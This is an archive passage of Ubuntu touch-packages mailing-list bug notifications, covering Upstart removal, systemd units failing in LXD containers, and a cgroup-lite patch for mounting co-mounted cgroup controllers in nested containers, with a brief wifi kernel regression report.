(and with that, i'll be needing a new distro :( ) -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to ubuntu-touch-meta in Ubuntu. https://bugs.launchpad.net/bugs/1649310 Title: RM Upstart, obsolete, superseeded by systemd Status in cgmanager package in Ubuntu: New Status in lxc-android-config package in Ubuntu: New Status in ubuntu-touch-meta package in Ubuntu: In Progress Status in ubuntu-touch-session package in Ubuntu: Triaged Status in unity8-desktop-session package in Ubuntu: In Progress Status in upstart package in Ubuntu: Triaged Status in upstart-watchdog package in Ubuntu: Triaged Bug description: In 18.04 LTS src:upstart should not be part of Ubuntu. It has already been removed from Debian. And most products have migrated to systemd. This is a tracking bug to remove a collection of packages that need to go away together with upstart. Some of these have been ported to systemd under different names, or no longer at all required. = Removal order = * ubuntu-touch-meta * unity8-desktop-session * ubuntu-touch-session * upstart-watchdog * lxc-android-config * upstart * cgmanager = Reverse depends checks = $ reverse-depends -b src:upstart Reverse-Build-Depends = * autopilot (for upstart) https://launchpad.net/ubuntu/+source/autopilot/1.6.0+17.04.20170313-0ubuntu3 * tarantool (for upstart) ./debian/control: dh-systemd (>= 1.22) | sysvinit (<< 2.88dsf-59) | upstart (<< 1.13), * ubuntuone-credentials (for upstart) https://launchpad.net/ubuntu/+source/ubuntuone-credentials/15.11+17.04.20161107ubuntu1 * unity (for libupstart-dev) https://code.launchpad.net/~xnox/unity/no-more-upstart-dep/+merge/322283 https://bileto.ubuntu.com/#/ticket/2730 $ reverse-depends src:upstart Reverse-Depends === * ubuntu-touch-session (for upstart) * ubuntu-ui-toolkit-autopilot [amd64 arm64 armhf i386 ppc64el] (for upstart) https://launchpad.net/ubuntu/+source/ubuntu-ui-toolkit/1.3.2190+17.04.20170327ubuntu1 * unity8-desktop-session(for upstart) * upstart-watchdog (for upstart) $ reverse-depends src:ubuntu-touch-session Reverse-Depends === * ubuntu-touch (for ubuntu-touch-session) $ reverse-depends -b src:ubuntu-touch-session No reverse dependencies found $ reverse-depends upstart-watchdog Reverse-Depends === * ubuntu-touch $ reverse-depends -b src:upstart-watchdog No reverse dependencies found $ reverse-depends src:ubuntu-touch-meta No reverse dependencies found $ reverse-depends -b src:ubuntu-touch-meta No reverse dependencies found $ reverse-depends src:unity8-desktop-session No reverse dependencies found $ reverse-depends -b src:unity8-desktop-session No reverse dependencies found $ reverse-depends src:cgmanager Reverse-Depends === * lxc-android-config(for cgmanager) * numad (for cgmanager) ./debian/control:Depends: systemd-sysv | cgmanager * ubuntu-core-libs (for libcgmanager0) https://launchpad.net/ubuntu/+source/ubuntu-core-meta/0.6.17 * upstart [amd64 arm64 armhf i386 ppc64el] (for libcgmanager0) $ reverse-depends -b src:cgmanager Reverse-Build-Depends = * qtmir (for libcgmanager-dev) https://launchpad.net/ubuntu/+source/qtmir/0.5.1+17.04.20170404-0ubuntu3 * qtmir-gles(for libcgmanager-dev) https://launchpad.net/ubuntu/+source/qtmir-gles/0.5.1+17.04.20170404-0ubuntu3 * ubuntu-app-launch (for libcgmanager-dev) https://launchpad.net/ubuntu/+source/ubuntu-app-launch/0.12+17.04.20170404.2-0ubuntu3 * upstart (for libcgmanager-dev) $ reverse-depends src:lxc-android-config Reverse-Depends === * ubuntu-touch (for lxc-android-config) $ reverse-depends -b src:lxc-android-config No reverse dependencies found To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/cgmanager/+bug/1649310/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1576341] Re: systemd in degraded state on startup in LXD containers
Thanks, Nish. My thoughts: 1.a sounds good 1.b i'd like another way to do that, but not sure what a better way would be. 1.c does lvm also fail in privileged containers? I can see no use to running it (for now) in an unprivileged container, so the same solution as 1.a seems reasonable. 1.d CAP_ADMIN_READ is not a real capability. So if 1.d is fixed by that, then something else is wrong. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to systemd in Ubuntu. https://bugs.launchpad.net/bugs/1576341 Title: systemd in degraded state on startup in LXD containers Status in lvm2 package in Ubuntu: Confirmed Status in lxd package in Ubuntu: Invalid Status in open-iscsi package in Ubuntu: Fix Released Status in systemd package in Ubuntu: Confirmed Bug description: The ubuntu:xenial image shows 'degraded' state in lxd on initial boot. $ lxc launch xenial x1 $ sleep 10 $ lxc file pull x1/etc/cloud/build.info - build_name: server serial: 20160420-145324 $ lxc exec x1 systemctl is-system-running degraded $ lxc exec x1 -- systemctl --state=failed UNIT LOAD ACTIVE SUBDESCRIPTION ● dev-hugepages.mount loaded failed failed Huge Pages File System ● iscsid.serviceloaded failed failed iSCSI initiator daemon (iscsid) ● open-iscsi.serviceloaded failed failed Login to default iSCSI targets ● systemd-remount-fs.serviceloaded failed failed Remount Root and Kernel File Systems ● systemd-sysctl.serviceloaded failed failed Apply Kernel Variables ● lvm2-lvmetad.socket loaded failed failed LVM2 metadata daemon socket ● systemd-journald-audit.socket loaded failed failed Journal Audit Socket LOAD = Reflects whether the unit definition was properly loaded. ACTIVE = The high-level unit activation state, i.e. generalization of SUB. SUB= The low-level unit activation state, values depend on unit type. 7 loaded units listed. Pass --all to see loaded but inactive units, too. To show all installed unit files use 'systemctl list-unit-files'. ProblemType: Bug DistroRelease: Ubuntu 16.04 Package: open-iscsi 2.0.873+git0.3b4b4500-14ubuntu3 ProcVersionSignature: Ubuntu 4.4.0-18.34-generic 4.4.6 Uname: Linux 4.4.0-18-generic x86_64 ApportVersion: 2.20.1-0ubuntu2 Architecture: amd64 Date: Thu Apr 28 17:28:04 2016 ProcEnviron: TERM=xterm-256color PATH=(custom, no user) SourcePackage: open-iscsi UpgradeStatus: No upgrade log present (probably fresh install) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/lvm2/+bug/1576341/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1668724] Re: fails to mount cgroupfs inside containers running on 16.04
Sorry, this got lost in my inbox. I used dput. I seemed to recall that in some recent cycle the it became either ok or preferred to use $release-updates instead of $release-proposed in SRUs. I can trivially change it ack to yakkety-proposed if preferred. For Trusty, I just noticed that the non-backports version was so old noone could really be using it (and AIUI trusty-backport is enabled by default). -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to cgroup-lite in Ubuntu. https://bugs.launchpad.net/bugs/1668724 Title: fails to mount cgroupfs inside containers running on 16.04 Status in cgroup-lite package in Ubuntu: Fix Released Status in cgroup-lite source package in Precise: Fix Committed Status in cgroup-lite source package in Trusty: New Status in cgroup-lite source package in Xenial: Fix Committed Status in cgroup-lite source package in Yakkety: New Bug description: I need to run nested Ubuntu 12.04 and 14.04 containers on 16.04 hosts, and have noticed that the cgroups-mount script for mounting the cgroups inside the containers has stopped working. This is because systemd now comounts multiple controllers on a single hierarchy, which prevents mounting them individually inside the container. === SRU Justification Impact: nested containers fail to start Reproduce: create a root owned container; install lxc and cgroup-lite; create a container, and try to start it. Starting will fail if cgroup-lite is running in the first level container without this patch. Regression potential: should be low, it's possible that the regexp is simply wrong for some cases. === To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/cgroup-lite/+bug/1668724/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
Re: [Touch-packages] [Bug 1668724] Re: fails to mount cgroupfs inside containers running on 16.04
Thanks for looking. I'll push that tonight. Original Message From: Cam Cope Sent: Monday, March 6, 2017 3:50 PM To: serge.hal...@gmail.com Reply To: Bug 1668724 Subject: [Bug 1668724] Re: fails to mount cgroupfs inside containers running on 16.04 LGTM -- You received this bug notification because you are subscribed to cgroup- lite in Ubuntu. Matching subscriptions: cgroup-lite https://bugs.launchpad.net/bugs/1668724 Title: fails to mount cgroupfs inside containers running on 16.04 Status in cgroup-lite package in Ubuntu: Fix Released Status in cgroup-lite source package in Precise: New Status in cgroup-lite source package in Trusty: New Status in cgroup-lite source package in Xenial: New Status in cgroup-lite source package in Yakkety: New Bug description: I need to run nested Ubuntu 12.04 and 14.04 containers on 16.04 hosts, and have noticed that the cgroups-mount script for mounting the cgroups inside the containers has stopped working. This is because systemd now comounts multiple controllers on a single hierarchy, which prevents mounting them individually inside the container. === SRU Justification Impact: nested containers fail to start Reproduce: create a root owned container; install lxc and cgroup-lite; create a container, and try to start it. Starting will fail if cgroup-lite is running in the first level container without this patch. Regression potential: should be low, it's possible that the regexp is simply wrong for some cases. === To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/cgroup-lite/+bug/1668724/+subscriptions -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to cgroup-lite in Ubuntu. https://bugs.launchpad.net/bugs/1668724 Title: fails to mount cgroupfs inside containers running on 16.04 Status in cgroup-lite package in Ubuntu: Fix Released Status in cgroup-lite source package in Precise: New Status in cgroup-lite source package in Trusty: New Status in cgroup-lite source package in Xenial: New Status in cgroup-lite source package in Yakkety: New Bug description: I need to run nested Ubuntu 12.04 and 14.04 containers on 16.04 hosts, and have noticed that the cgroups-mount script for mounting the cgroups inside the containers has stopped working. This is because systemd now comounts multiple controllers on a single hierarchy, which prevents mounting them individually inside the container. === SRU Justification Impact: nested containers fail to start Reproduce: create a root owned container; install lxc and cgroup-lite; create a container, and try to start it. Starting will fail if cgroup-lite is running in the first level container without this patch. Regression potential: should be low, it's possible that the regexp is simply wrong for some cases. === To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/cgroup-lite/+bug/1668724/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1668724] Re: fails to mount cgroupfs inside containers running on 16.04
(s@/tmp/2@/proc/cgroups@ of course) -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to cgroup-lite in Ubuntu. https://bugs.launchpad.net/bugs/1668724 Title: fails to mount cgroupfs inside containers running on 16.04 Status in cgroup-lite package in Ubuntu: Triaged Status in cgroup-lite source package in Precise: New Status in cgroup-lite source package in Trusty: New Status in cgroup-lite source package in Xenial: New Status in cgroup-lite source package in Yakkety: New Bug description: I need to run nested Ubuntu 12.04 and 14.04 containers on 16.04 hosts, and have noticed that the cgroups-mount script for mounting the cgroups inside the containers has stopped working. This is because systemd now comounts multiple controllers on a single hierarchy, which prevents mounting them individually inside the container. === SRU Justification Impact: nested containers fail to start Reproduce: create a root owned container; install lxc and cgroup-lite; create a container, and try to start it. Starting will fail if cgroup-lite is running in the first level container without this patch. Regression potential: should be low, it's possible that the regexp is simply wrong for some cases. === To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/cgroup-lite/+bug/1668724/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1668724] Re: fails to mount cgroupfs inside containers running on 16.04
FWIW something like: for d in `tail -n +2 /tmp/2 | awk '{ if ($2 == 0) print $1 else if (a[$2]) a[$2] = a[$2]","$1 else a[$2]=$1 };END{ for(i in a) { print a[i] } }'`; do mkdir -p /sys/fs/cgroup/$d mountpoint -q /sys/fs/cgroup/$d || (mount -n -t cgroup -o $d cgroup /sys/fs/cgroup/$d || rmdir /sys/fs/cgroup/$d || true) done seems to work. Again excluding the possibility of unified hierarchy, which I've not tested. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to cgroup-lite in Ubuntu. https://bugs.launchpad.net/bugs/1668724 Title: fails to mount cgroupfs inside containers running on 16.04 Status in cgroup-lite package in Ubuntu: Triaged Status in cgroup-lite source package in Precise: New Status in cgroup-lite source package in Trusty: New Status in cgroup-lite source package in Xenial: New Status in cgroup-lite source package in Yakkety: New Bug description: I need to run nested Ubuntu 12.04 and 14.04 containers on 16.04 hosts, and have noticed that the cgroups-mount script for mounting the cgroups inside the containers has stopped working. This is because systemd now comounts multiple controllers on a single hierarchy, which prevents mounting them individually inside the container. === SRU Justification Impact: nested containers fail to start Reproduce: create a root owned container; install lxc and cgroup-lite; create a container, and try to start it. Starting will fail if cgroup-lite is running in the first level container without this patch. Regression potential: should be low, it's possible that the regexp is simply wrong for some cases. === To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/cgroup-lite/+bug/1668724/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1668724] Re: fails to mount cgroupfs inside containers running on 16.04
There is a bug (which is fixed in newer versions) in lxc in that it does not ignore cgroups which are not used by the container. So in your particular case, if you're not using the co-mounted controllers, then indeed fixing the lxc bug should work for you as well. Nevertheless some people will want to run containers using those controllers, so cgroup-lite (and cgroupfs-mount) will need to be fixed. But that's not your problem :) I understand if you want to leave it at this - I'll just need to improve my awk skills :) I just wanted to ask to avoid duplication of effort. Thanks for your help so far. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to cgroup-lite in Ubuntu. https://bugs.launchpad.net/bugs/1668724 Title: fails to mount cgroupfs inside containers running on 16.04 Status in cgroup-lite package in Ubuntu: Triaged Status in cgroup-lite source package in Precise: New Status in cgroup-lite source package in Trusty: New Status in cgroup-lite source package in Xenial: New Status in cgroup-lite source package in Yakkety: New Bug description: I need to run nested Ubuntu 12.04 and 14.04 containers on 16.04 hosts, and have noticed that the cgroups-mount script for mounting the cgroups inside the containers has stopped working. This is because systemd now comounts multiple controllers on a single hierarchy, which prevents mounting them individually inside the container. === SRU Justification Impact: nested containers fail to start Reproduce: create a root owned container; install lxc and cgroup-lite; create a container, and try to start it. Starting will fail if cgroup-lite is running in the first level container without this patch. Regression potential: should be low, it's possible that the regexp is simply wrong for some cases. === To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/cgroup-lite/+bug/1668724/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1668724] Re: fails to mount cgroupfs inside containers running on 16.04
This bug incidentally also affects the cgroupfs-mount package. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to cgroup-lite in Ubuntu. https://bugs.launchpad.net/bugs/1668724 Title: fails to mount cgroupfs inside containers running on 16.04 Status in cgroup-lite package in Ubuntu: Triaged Status in cgroup-lite source package in Precise: New Status in cgroup-lite source package in Trusty: New Status in cgroup-lite source package in Xenial: New Status in cgroup-lite source package in Yakkety: New Bug description: I need to run nested Ubuntu 12.04 and 14.04 containers on 16.04 hosts, and have noticed that the cgroups-mount script for mounting the cgroups inside the containers has stopped working. This is because systemd now comounts multiple controllers on a single hierarchy, which prevents mounting them individually inside the container. === SRU Justification Impact: nested containers fail to start Reproduce: create a root owned container; install lxc and cgroup-lite; create a container, and try to start it. Starting will fail if cgroup-lite is running in the first level container without this patch. Regression potential: should be low, it's possible that the regexp is simply wrong for some cases. === To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/cgroup-lite/+bug/1668724/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1668724] Re: fails to mount cgroupfs inside containers running on 16.04
(Note - this means the patch I just pushed to zesty is in fact wrong. Since zesty requires systemd this doesn't really matter, but we must get a working patch before pushing SRU patches) @ccope, please let me know if you care to write an update patch. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to cgroup-lite in Ubuntu. https://bugs.launchpad.net/bugs/1668724 Title: fails to mount cgroupfs inside containers running on 16.04 Status in cgroup-lite package in Ubuntu: Triaged Status in cgroup-lite source package in Precise: New Status in cgroup-lite source package in Trusty: New Status in cgroup-lite source package in Xenial: New Status in cgroup-lite source package in Yakkety: New Bug description: I need to run nested Ubuntu 12.04 and 14.04 containers on 16.04 hosts, and have noticed that the cgroups-mount script for mounting the cgroups inside the containers has stopped working. This is because systemd now comounts multiple controllers on a single hierarchy, which prevents mounting them individually inside the container. === SRU Justification Impact: nested containers fail to start Reproduce: create a root owned container; install lxc and cgroup-lite; create a container, and try to start it. Starting will fail if cgroup-lite is running in the first level container without this patch. Regression potential: should be low, it's possible that the regexp is simply wrong for some cases. === To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/cgroup-lite/+bug/1668724/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1668724] Re: fails to mount cgroupfs inside containers running on 16.04
Hm, yes i see (hierarchy 0). I do worry that means that systems with the unified hierarchy will be still more of a problem, since it is mounted as hierarchy 0. But then it's probably fine to just say that cgroup-lite doesn't support unified hierarchy. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to cgroup-lite in Ubuntu. https://bugs.launchpad.net/bugs/1668724 Title: fails to mount cgroupfs inside containers running on 16.04 Status in cgroup-lite package in Ubuntu: Triaged Status in cgroup-lite source package in Precise: New Status in cgroup-lite source package in Trusty: New Status in cgroup-lite source package in Xenial: New Status in cgroup-lite source package in Yakkety: New Bug description: I need to run nested Ubuntu 12.04 and 14.04 containers on 16.04 hosts, and have noticed that the cgroups-mount script for mounting the cgroups inside the containers has stopped working. This is because systemd now comounts multiple controllers on a single hierarchy, which prevents mounting them individually inside the container. === SRU Justification Impact: nested containers fail to start Reproduce: create a root owned container; install lxc and cgroup-lite; create a container, and try to start it. Starting will fail if cgroup-lite is running in the first level container without this patch. Regression potential: should be low, it's possible that the regexp is simply wrong for some cases. === To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/cgroup-lite/+bug/1668724/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1668724] Re: fails to mount cgroupfs inside containers running on 16.04
** Also affects: cgroup-lite (Ubuntu Trusty) Importance: Undecided Status: New ** Also affects: cgroup-lite (Ubuntu Precise) Importance: Undecided Status: New ** Also affects: cgroup-lite (Ubuntu Yakkety) Importance: Undecided Status: New ** Also affects: cgroup-lite (Ubuntu Xenial) Importance: Undecided Status: New ** Changed in: cgroup-lite (Ubuntu Precise) Importance: Undecided => High ** Changed in: cgroup-lite (Ubuntu Trusty) Importance: Undecided => High ** Changed in: cgroup-lite (Ubuntu Xenial) Importance: Undecided => High ** Changed in: cgroup-lite (Ubuntu Yakkety) Importance: Undecided => High ** Description changed: I need to run nested Ubuntu 12.04 and 14.04 containers on 16.04 hosts, and have noticed that the cgroups-mount script for mounting the cgroups inside the containers has stopped working. This is because systemd now comounts multiple controllers on a single hierarchy, which prevents mounting them individually inside the container. + + === SRU Justification + Impact: nested containers fail to start + Reproduce: create a root owned container; install lxc and cgroup-lite; create a container, and try to start it. Starting will fail if cgroup-lite is running in the first level container without this patch. + Regression potential: should be low, it's possible that the regexp is simply wrong for some cases. + === -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to cgroup-lite in Ubuntu. https://bugs.launchpad.net/bugs/1668724 Title: fails to mount cgroupfs inside containers running on 16.04 Status in cgroup-lite package in Ubuntu: Triaged Status in cgroup-lite source package in Precise: New Status in cgroup-lite source package in Trusty: New Status in cgroup-lite source package in Xenial: New Status in cgroup-lite source package in Yakkety: New Bug description: I need to run nested Ubuntu 12.04 and 14.04 containers on 16.04 hosts, and have noticed that the cgroups-mount script for mounting the cgroups inside the containers has stopped working. This is because systemd now comounts multiple controllers on a single hierarchy, which prevents mounting them individually inside the container. === SRU Justification Impact: nested containers fail to start Reproduce: create a root owned container; install lxc and cgroup-lite; create a container, and try to start it. Starting will fail if cgroup-lite is running in the first level container without this patch. Regression potential: should be low, it's possible that the regexp is simply wrong for some cases. === To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/cgroup-lite/+bug/1668724/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1668724] Re: fails to mount cgroupfs inside containers running on 16.04
I assume /sys/fs/cgroup/systemd was used because that's where systemd expected to see it. I can't find any version which mounts it at /sys/fs/cgroup/name=systemd - do you have a version that does that? -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to cgroup-lite in Ubuntu. https://bugs.launchpad.net/bugs/1668724 Title: fails to mount cgroupfs inside containers running on 16.04 Status in cgroup-lite package in Ubuntu: Triaged Bug description: I need to run nested Ubuntu 12.04 and 14.04 containers on 16.04 hosts, and have noticed that the cgroups-mount script for mounting the cgroups inside the containers has stopped working. This is because systemd now comounts multiple controllers on a single hierarchy, which prevents mounting them individually inside the container. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/cgroup-lite/+bug/1668724/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1668724] Re: fails to mount cgroupfs inside containers running on 16.04
Thanks for the patches. Note that you've changed the loop variable from d to c, but the loop is still using d, so nothing gets mounted with that patch verbatim. Switching the variable back to d fixes the issue for me. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to cgroup-lite in Ubuntu. https://bugs.launchpad.net/bugs/1668724 Title: fails to mount cgroupfs inside containers running on 16.04 Status in cgroup-lite package in Ubuntu: Triaged Bug description: I need to run nested Ubuntu 12.04 and 14.04 containers on 16.04 hosts, and have noticed that the cgroups-mount script for mounting the cgroups inside the containers has stopped working. This is because systemd now comounts multiple controllers on a single hierarchy, which prevents mounting them individually inside the container. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/cgroup-lite/+bug/1668724/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1668724] Re: fails to mount cgroupfs inside containers running on 16.04
** Changed in: cgroup-lite (Ubuntu) Importance: Undecided => High ** Changed in: cgroup-lite (Ubuntu) Status: New => Triaged -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to cgroup-lite in Ubuntu. https://bugs.launchpad.net/bugs/1668724 Title: fails to mount cgroupfs inside containers running on 16.04 Status in cgroup-lite package in Ubuntu: Triaged Bug description: I need to run nested Ubuntu 12.04 and 14.04 containers on 16.04 hosts, and have noticed that the cgroups-mount script for mounting the cgroups inside the containers has stopped working. This is because systemd now comounts multiple controllers on a single hierarchy, which prevents mounting them individually inside the container. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/cgroup-lite/+bug/1668724/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1576341] Re: fails in lxd container
Seems like just adding ConditionVirtualization=!container to debian//open-iscsi.service should fix it. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to lvm2 in Ubuntu. https://bugs.launchpad.net/bugs/1576341 Title: fails in lxd container Status in lvm2 package in Ubuntu: Confirmed Status in lxd package in Ubuntu: Invalid Status in open-iscsi package in Ubuntu: Confirmed Status in systemd package in Ubuntu: Confirmed Bug description: The ubuntu:xenial image shows 'degraded' state in lxd on initial boot. $ lxc launch xenial x1 $ sleep 10 $ lxc file pull x1/etc/cloud/build.info - build_name: server serial: 20160420-145324 $ lxc exc x1 systemctl is-system-running degraded $ lxc exec x1 systemctl --state=failed UNIT LOAD ACTIVE SUBDESCRIPTION ● dev-hugepages.mount loaded failed failed Huge Pages File System ● iscsid.serviceloaded failed failed iSCSI initiator daemon (iscsid) ● open-iscsi.serviceloaded failed failed Login to default iSCSI targets ● systemd-remount-fs.serviceloaded failed failed Remount Root and Kernel File Systems ● systemd-sysctl.serviceloaded failed failed Apply Kernel Variables ● lvm2-lvmetad.socket loaded failed failed LVM2 metadata daemon socket ● systemd-journald-audit.socket loaded failed failed Journal Audit Socket LOAD = Reflects whether the unit definition was properly loaded. ACTIVE = The high-level unit activation state, i.e. generalization of SUB. SUB= The low-level unit activation state, values depend on unit type. 7 loaded units listed. Pass --all to see loaded but inactive units, too. To show all installed unit files use 'systemctl list-unit-files'. ProblemType: Bug DistroRelease: Ubuntu 16.04 Package: open-iscsi 2.0.873+git0.3b4b4500-14ubuntu3 ProcVersionSignature: Ubuntu 4.4.0-18.34-generic 4.4.6 Uname: Linux 4.4.0-18-generic x86_64 ApportVersion: 2.20.1-0ubuntu2 Architecture: amd64 Date: Thu Apr 28 17:28:04 2016 ProcEnviron: TERM=xterm-256color PATH=(custom, no user) SourcePackage: open-iscsi UpgradeStatus: No upgrade log present (probably fresh install) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/lvm2/+bug/1576341/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1639440] Re: [desktop] apps don't start, missing logs
This is related to the other open bugs caused by systemd starting to mount the unified hierarchy. There had been a branch of cgmanager able to handle unified, around June 2015, but it was only experimental. Does unity still require cgmanager? Note that cgmanager's deprecation (https://linuxcontainers.org/) was announced some time ago. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to unity8 in Ubuntu. https://bugs.launchpad.net/bugs/1639440 Title: [desktop] apps don't start, missing logs Status in Canonical System Image: Incomplete Status in cgmanager package in Ubuntu: New Status in ubuntu-app-launch package in Ubuntu: New Status in unity8 package in Ubuntu: Incomplete Bug description: Ubuntu 17.04 + proposed (unity8 desktop session) unity8/zesty-proposed,now 8.14+17.04.20161027-0ubuntu1 amd64 [installed,automatic] apps don't load and i can't find the logs in ~/.cache/upstart for the apps. i'll upload the logs that i do have for unity8 To manage notifications about this bug go to: https://bugs.launchpad.net/canonical-devices-system-image/+bug/1639440/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1633264] Re: My intel 7260 wifi device gone after upgrading to 4.4.0-43 kernel
Nevermind. ** Changed in: network-manager (Ubuntu) Status: New => Invalid -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to network-manager in Ubuntu. https://bugs.launchpad.net/bugs/1633264 Title: My intel 7260 wifi device gone after upgrading to 4.4.0-43 kernel Status in network-manager package in Ubuntu: Invalid Bug description: Hello, after upgrading ubuntu 16.04 from 4.4.0-42 to 4.4.0-34 kernel my wifi stopped working altogether. I have Intel wireless 7260 wifi card. If I boot the computer with -42 kernel everything is ok, with -43 kernel wifi stopped working, only lo interface available in ifconfig, lshw -C network says network unclaimed. I'm not sure where to look for meaningful logs related to the issue. Help pls! To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/network-manager/+bug/1633264/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1633264] [NEW] My intel 7260 wifi device gone after upgrading to 4.4.0-43 kernel
Public bug reported: Hello, after upgrading ubuntu 16.04 from 4.4.0-42 to 4.4.0-34 kernel my wifi stopped working altogether. I have Intel wireless 7260 wifi card. If I boot the computer with -42 kernel everything is ok, with -43 kernel wifi stopped working, only lo interface available in ifconfig, lshw -C network says network unclaimed. I'm not sure where to look for meaningful logs related to the issue. Help pls! ** Affects: network-manager (Ubuntu) Importance: Undecided Status: New -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to network-manager in Ubuntu. https://bugs.launchpad.net/bugs/1633264 Title: My intel 7260 wifi device gone after upgrading to 4.4.0-43 kernel Status in network-manager package in Ubuntu: New Bug description: Hello, after upgrading ubuntu 16.04 from 4.4.0-42 to 4.4.0-34 kernel my wifi stopped working altogether. I have Intel wireless 7260 wifi card. If I boot the computer with -42 kernel everything is ok, with -43 kernel wifi stopped working, only lo interface available in ifconfig, lshw -C network says network unclaimed. I'm not sure where to look for meaningful logs related to the issue. Help pls! To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/network-manager/+bug/1633264/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1611243] Re: lxc-attach "lxc-attach: attach.c: lxc_attach: 730 failed to get the init pid"
